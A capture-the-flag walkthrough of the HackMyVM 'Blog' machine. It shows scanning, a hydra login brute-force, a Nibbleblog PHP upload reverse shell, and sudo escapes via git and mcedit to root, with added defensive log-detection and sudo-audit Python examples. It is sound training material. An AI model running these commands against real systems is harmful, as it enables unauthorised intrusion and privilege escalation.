Blog Writeup from HackMyVM – Walkthrough
“Blog” is an easy machine from HackMyVM by d4t4s3c. If you have done many machines, this is a piece of cake; if you are new, I definitely suggest you do it on your own. Enumeration starts with directory brute-forcing, which reveals a blog. The blog has a file upload vulnerability through which one can execute a PHP script and obtain a reverse shell. Then we escalate to the user ‘admin’ via sudo permissions on git. Lastly, another sudo-permitted binary, ‘mcedit’, gives us the root shell.
The machine can be downloaded from HackMyVM.
Step 1: Get the IP address
Firstly, we have to identify the IP address of the target machine. I mostly use fping and netdiscover for this purpose.
❯ fping -aqg 10.0.0.0/24
10.0.0.1
10.0.0.2
10.0.0.3
10.0.0.4
10.0.0.139
The IP address of the target is 10.0.0.139 and that of my Kali Linux machine is 10.0.0.4.
Step 2: Scan open ports
Next, we have to identify the open services on the target. Most of the time it is just an HTTP web server; let’s check whether anything else is exposed.
❯ nmap -T4 -sC -sV -p- -oN nmap.log 10.0.0.139
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-27 21:30 +0545
Nmap scan report for blog.hmv (10.0.0.139)
Host is up (0.00082s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 56:9b:dd:56:a5:c1:e3:52:a8:42:46:18:5e:0c:12:86 (RSA)
| 256 1b:d2:cc:59:21:50:1b:39:19:77:1d:28:c0:be:c6:82 (ECDSA)
|_ 256 9c:e7:41:b6:ad:03:ed:f5:a1:4c:cc:0a:50:79:1c:20 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
As I said, there is only the HTTP server to enumerate further.
Step 3: Enumerate the webserver
On the HTTP server, we can see that the index page pings localhost. I checked whether the script accepts any GET parameter that would allow command execution, but I couldn’t get anything out of the ‘index.php’ page. Thus, I performed directory enumeration using gobuster.
❯ gobuster dir -q -r -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.0.0.139 -x txt,html,php -o medium.log
/index.php (Status: 200) [Size: 271]
/my_weblog (Status: 200) [Size: 4317]
Here, we find a new path ‘/my_weblog’ that needs further enumeration.
Step 4: Enumerating the blog
When we check the page source, we can see that the site runs Nibbleblog.
<!DOCTYPE HTML>
<html>
<head>
<meta charset="utf-8">
<title>Blog - Welcome to admin blog</title>
<meta name="description" content="Welcome to Nibbleblog">
<meta name="generator" content="Nibbleblog">
<!-- ------------ snip ------------------ -->
</html>
Searching for exploits for this CMS, I learned that it suffers from an arbitrary file upload vulnerability; however, exploiting it requires authentication. I tried the path /admin.php on the target and, fortunately, found the admin login page.
To brute-force the login, we need the form input names. Looking at the source code of the admin page, we find that they are “username” and “password”.
<form id="js_form" name="form" method="post">
<div class="form_block"><input class="username" name="username" type="text" placeholder="Username" autocomplete="off" maxlength="254"></div>
<div class="form_block"><input class="password" name="password" type="password" placeholder="Password" autocomplete="off" maxlength="254"></div>
<div class="form_block"><input type="checkbox" id="js_remember" name="remember" class="float" value="1"><label class="for_checkbox remember" for="js_remember">Remember me</label><input type="submit" class="save" value="Login"></div>
</form>
Lastly, I performed the brute-forcing using hydra. Hydra needs a way to tell a failed login attempt from a successful one. In this case, a failed login returns a page containing the word “Incorrect”, so that string is used as the failure condition.
❯ hydra -l admin -P /home/kali/rockyou.txt 'http-post-form://10.0.0.139/my_weblog/admin.php:username=^USER^&password=^PASS^:Incorrect'
We get the password “k*****” for the user admin.
Step 5: Insecure file upload
The vulnerability is that an authenticated admin can upload any file type, including PHP, from “Plugins > Plugin :: My image”. The uploaded script is then reachable at the path “/content/private/plugins/my_image/image.php”. For the reverse shell payload, I use revshells.com.
Reference: https://packetstormsecurity.com/files/133425/NibbleBlog-4.0.3-Shell-Upload.html
I listen on port 9001.
❯ nc -nlvp 9001
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
With the listener running, I uploaded the shell and browsed to the uploaded file’s path to get the reverse shell. Next, I upgraded it to a proper interactive shell.
Upgrade to a fully interactive shell
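To see what Steps 4 and 5 look like from the defender’s side, here is an added Python example (not from the original post) that runs two detections over constructed Apache access-log lines modelled on this walkthrough: a burst of POSTs to the Nibbleblog login at /my_weblog/admin.php from one source, and any request for a .php file under the plugin content directory where the “My image” upload lands. The sample log lines and the threshold of 5 are assumptions.

```python
import re
from collections import Counter

# Constructed Apache access-log sample (not from the original post) modelled on the
# traffic this walkthrough produces: a hydra run against the Nibbleblog login, then
# a request to the PHP file dropped through the "My image" plugin, plus benign noise.
SAMPLE_LOG = """\
10.0.0.4 - - [27/Feb/2022:21:40:01 +0545] "POST /my_weblog/admin.php HTTP/1.0" 200 2311
10.0.0.4 - - [27/Feb/2022:21:40:01 +0545] "POST /my_weblog/admin.php HTTP/1.0" 200 2311
10.0.0.4 - - [27/Feb/2022:21:40:02 +0545] "POST /my_weblog/admin.php HTTP/1.0" 200 2311
10.0.0.4 - - [27/Feb/2022:21:40:02 +0545] "POST /my_weblog/admin.php HTTP/1.0" 200 2311
10.0.0.4 - - [27/Feb/2022:21:40:03 +0545] "POST /my_weblog/admin.php HTTP/1.0" 200 2311
10.0.0.4 - - [27/Feb/2022:21:40:03 +0545] "POST /my_weblog/admin.php HTTP/1.0" 302 0
10.0.0.4 - - [27/Feb/2022:21:41:10 +0545] "GET /my_weblog/content/private/plugins/my_image/image.php HTTP/1.1" 200 0
10.0.0.7 - - [27/Feb/2022:21:42:00 +0545] "GET /my_weblog/content/private/plugins/my_image/image.jpg HTTP/1.1" 200 8123
10.0.0.7 - - [27/Feb/2022:21:42:01 +0545] "GET /my_weblog/ HTTP/1.1" 200 4317
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
LOGIN_PATH = "/my_weblog/admin.php"  # the Nibbleblog admin login brute-forced in Step 4
# Files stored under a plugin's private content directory should be images, never PHP.
PLUGIN_PHP_RE = re.compile(r"/content/private/plugins/[^/]+/[^?]*\.php(\?.*)?$")


def analyse(log_text, login_threshold=5):
    """Return per-IP login POST counts at or above the threshold, plus every
    request for a PHP file under the plugins content directory."""
    login_posts = Counter()
    plugin_php_hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in Apache common/combined format
        ip, method, path = m["ip"], m["method"], m["path"]
        if method == "POST" and path.split("?")[0] == LOGIN_PATH:
            login_posts[ip] += 1
        if PLUGIN_PHP_RE.search(path):
            plugin_php_hits.append((ip, path))
    bruteforce = {ip: n for ip, n in login_posts.items() if n >= login_threshold}
    return {"bruteforce": bruteforce, "plugin_php_hits": plugin_php_hits}


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_LOG).items():
        print(key, value)
```

A single hit on a .php file under the plugin directory is worth an alert on its own, since a correctly configured deployment would never serve one from there.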
❯ nc -nlvp 9001
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.0.0.139.
Ncat: Connection from 10.0.0.139:43156.
Linux blog 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
17:20:49 up 2:18, 0 users, load average: 0.00, 0.01, 0.27
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@blog:/$ ^Z
[1] + 8086 suspended nc -nlvp 9001
❯ stty raw -echo;fg
[1] + 8086 continued nc -nlvp 9001
www-data@blog:/$ export TERM=xterm
www-data@blog:/$ stty rows 30 cols 168
www-data@blog:/$
Step 6: Upgrade to the user ‘admin’
After we get the foothold, we can check the sudo permissions. There is a rule for the git binary that lets us run it as the user ‘admin’.
www-data@blog:/$ sudo -l
sudo: unable to resolve host blog: No address associated with hostname
Matching Defaults entries for www-data on blog:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on blog:
(admin) NOPASSWD: /usr/bin/git
From GTFOBins, I picked a command that drops git into the ‘less’ pager, from which a shell can be spawned.
sudo -u admin git -p help config
!/bin/bash
Reference: https://gtfobins.github.io/gtfobins/git/#sudo
Step 7: Upgrade to the root user
After we get the admin user, we can check that user’s sudo permissions too.
admin@blog:/$ sudo -l
sudo: unable to resolve host blog: No address associated with hostname
Matching Defaults entries for admin on blog:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User admin may run the following commands on blog:
(root) NOPASSWD: /usr/bin/mcedit
Running the binary under sudo opens the editor. On the File menu (Alt+F), there is a menu item, User menu… (F11). From there, we can choose “Invoke `shell'” (s), which gives us an sh shell as root. Finally, we start a bash shell by typing “/bin/bash”.
admin@blog:/$ sudo mcedit
sudo: unable to resolve host blog: No address associated with hostname
# /bin/sh /tmp/mc-root/mcusrR641H1
# bash
root@blog:/# echo nepcodex.com; md5sum /etc/shadow
nepcodex.com
f3587fe9c737ad77ab2ff8590e27ce17 /etc/shadow
root@blog:/#
In this way, we can get to the root shell.
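Both sudo rules in Steps 6 and 7 are exploitable because git and mcedit can spawn a shell once they are running. As an added example that is not part of the original post, this Python audit parses `sudo -l` output in the format shown above and flags such rules; the shell-escape list and the extra cat rule in the constructed admin sample are assumptions.

```python
import re

# Constructed copies of the `sudo -l` outputs from Steps 6 and 7 (sample input for
# this example); the admin sample also carries an assumed harmless rule for contrast.
SUDO_L_WWW_DATA = r"""
Matching Defaults entries for www-data on blog:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on blog:
    (admin) NOPASSWD: /usr/bin/git
"""
SUDO_L_ADMIN = r"""
User admin may run the following commands on blog:
    (root) NOPASSWD: /usr/bin/mcedit
    (root) /bin/cat /var/log/apache2/access.log, /bin/cat /var/log/apache2/error.log
"""

# One rule line: "(runas) TAG: TAG: /path/cmd args, /path/other args".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+?)\s*$")
# Binaries that let the caller run arbitrary commands once started (editors, pagers and
# tools that invoke a pager). An assumption for this example, not a complete list.
SHELL_ESCAPE_BINARIES = {"git", "mcedit", "less", "more", "vim", "vi", "nano", "man"}


def audit_sudo_rules(sudo_l_output):
    """Parse `sudo -l` output into (runas, nopasswd, command, verdict) tuples.
    Verdict is 'high' for ALL or a shell-escape-capable binary, else 'review'."""
    rules = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # Defaults lines, headers and blank lines are not rules
        nopasswd = "NOPASSWD:" in m["tags"]
        for cmd in (c.strip() for c in m["cmds"].split(",")):
            if not cmd:
                continue  # tolerate a trailing comma
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            verdict = "high" if cmd == "ALL" or binary in SHELL_ESCAPE_BINARIES else "review"
            rules.append((m["runas"], nopasswd, cmd, verdict))
    return rules


def high_risk(sudo_l_output):
    """Only the rules that give the caller an interactive shell as the runas user."""
    return [r for r in audit_sudo_rules(sudo_l_output) if r[3] == "high"]


if __name__ == "__main__":
    for sample in (SUDO_L_WWW_DATA, SUDO_L_ADMIN):
        print(high_risk(sample))
```

The remediation is to grant a wrapper script with fixed arguments rather than an editor or VCS client, since sudo cannot restrict what those programs do after they start.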